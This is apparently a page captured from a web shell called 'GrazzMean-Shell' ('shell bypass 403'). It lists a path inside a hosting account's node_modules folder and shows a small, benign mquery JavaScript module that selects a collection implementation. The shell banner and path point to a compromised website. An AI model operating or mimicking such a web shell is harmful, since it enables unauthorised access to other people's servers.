shell bypass 403
GrazzMean-Shell Shell
: /proc/self/root/home/allssztx/clarkesmusicservices.com/node_modules/mquery/lib/collection/ [ drwxr-xr-x ]
'use strict';
const env = require('../env');
if ('unknown' == env.type) {
throw new Error('Unknown environment');
}
module.exports =
env.isNode ? require('./node') :
env.isMongo ? require('./collection') :
require('./collection');